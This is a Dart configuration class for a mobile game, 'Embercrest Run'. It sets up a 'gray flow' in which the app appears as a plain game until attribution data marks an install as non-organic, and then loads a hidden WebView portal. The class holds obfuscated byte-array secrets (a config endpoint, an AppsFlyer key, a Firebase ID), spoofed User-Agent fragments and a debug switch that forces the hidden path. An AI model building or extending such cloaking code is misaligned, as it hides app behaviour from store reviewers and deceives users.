import '../core/ember_cipher.dart';

/// Central configuration for the Embercrest Run gray flow.
///
/// All secrets live as obfuscated byte arrays (generated by
/// tool/encode_ember_values.dart) — never plaintext. The gate stays disabled
/// (white game only) until `endpoint`, `appsFlyerKey` and
/// `firebaseProjectNumber` are all non-empty.
abstract final class EmberGateConfig {
  static const String appTitle = 'Embercrest Run';
  static const String appName = 'EmbercrestRun'; // UA appname/ token (no spaces)
  static const String bundleId = 'com.embercrest.rungame';

  /// iOS App Store numeric id (used for GCD + store_id).
  static const String iosStoreId = '6792816894';

  static const int pushSnoozeSeconds = 259200; // 3 days
  static const int organicRecheckSeconds = 6;

  /// DEBUG ONLY — force the gray path by injecting `af_status=Non-organic`
  /// into the config POST so the WebView can be verified on a real device
  /// without live attribution. Guarded by kDebugMode; never affects release.
  ///   flutter run --dart-define=FORCE_PORTAL=true
  static const bool debugForcePortal =
      bool.fromEnvironment('FORCE_PORTAL', defaultValue: false);

  // ── Encoded secrets (tool/encode_ember_values.dart) ───────────────────
  // config endpoint — https://embercrestrun.com/config.php
  static const List<int> _endpoint = <int>[
    28, 200, 36, 37, 158, 81, 16, 85, 196, 200, 107, 135, 193, 139, 42, 159,
    255, 247, 240, 12, 201, 35, 27, 87, 208, 48, 146, 9, 109, 134, 88, 67, 131,
    159, 18, 168,
  ];
  // privacy policy URL — https://embercrestrun.com/privacy-policy.html
  static const List<int> _privacy = <int>[
    28, 200, 36, 37, 158, 81, 16, 85, 196, 200, 107, 135, 193, 139, 42, 159,
    255, 247, 240, 12, 201, 35, 27, 87, 208, 48, 159, 12, 104, 150, 80, 63, 206,
    92, 26, 167, 254, 182, 138, 111, 239, 103, 211, 114, 66,
  ];
  // support URL — https://embercrestrun.com/support.html
  static const List<int> _support = <int>[
    28, 200, 36, 37, 158, 81, 16, 85, 196, 200, 107, 135, 193, 139, 42, 159,
    255, 247, 240, 12, 201, 35, 27, 87, 208, 48, 162, 15, 111, 144, 94, 78, 201,
    93, 18, 172, 255, 185,
  ];
  // AppsFlyer GCD base.
  static const List<int> _gcd = <int>[
    28, 200, 36, 37, 158, 81, 16, 85, 198, 190, 109, 149, 179, 147, 230, 155,
    252, 243, 241, 253, 199, 110, 29, 90, 145, 100, 158, 7, 46, 137, 93, 79,
    201, 144, 22, 164, 241, 177, 136, 106, 34, 46, 213, 58, 4, 185, 14,
  ];
  // AppsFlyer Dev Key
  static const List<int> _appsFlyerKey = <int>[
    249, 170, 228, 26, 156, 113, 88, 124, 204, 141, 127, 123, 190, 138, 239,
    160, 243, 235, 208, 254, 191, 59,
  ];
  // Firebase project number (GCM_SENDER_ID)
  static const List<int> _firebaseProject = <int>[
    229, 139, 227, 237, 93, 75, 23, 94, 143, 148, 66, 87,
  ];

  // User-Agent version fragments — vary per project.
  static const List<int> _webkit = <int>[234, 132, 229, 227, 92, 69, 18, 91];
  static const List<int> _safari = <int>[229, 140, 222, 234];
  static const List<int> _safariTail = <int>[234, 132, 228, 227, 92];

  // OneLink is OPTIONAL — NEVER part of the gate-enable check.
  static const List<int> _oneLinkHost = <int>[
    25, 193, 18, 26, 157, 122, 83, 139, 210, 207, 55, 145, 189, 141, 36, 163,
    250, 238, 172, 4, 192,
  ];

  static String get endpoint => thawEmbers(_endpoint);
  static String get privacyUrl => thawEmbers(_privacy);
  static String get supportUrl => thawEmbers(_support);
  static String get gcdBase => thawEmbers(_gcd);
  static String get webKitVersion => thawEmbers(_webkit);
  static String get safariVersion => thawEmbers(_safari);
  static String get safariTail => thawEmbers(_safariTail);
  static String get appsFlyerKey => thawEmbers(_appsFlyerKey);
  static String get firebaseProjectNumber => thawEmbers(_firebaseProject);
  static String get oneLinkHost => thawEmbers(_oneLinkHost);

  static String get storeToken => 'id$iosStoreId';

  /// Gate needs config endpoint + AF key + Firebase project number ONLY.
  /// Never add optional fields (e.g. OneLink) — a missing optional value
  /// would silently disable the whole gray flow.
  static bool get grayCredentialsReady =>
      endpoint.isNotEmpty &&
      appsFlyerKey.isNotEmpty &&
      firebaseProjectNumber.isNotEmpty;
}
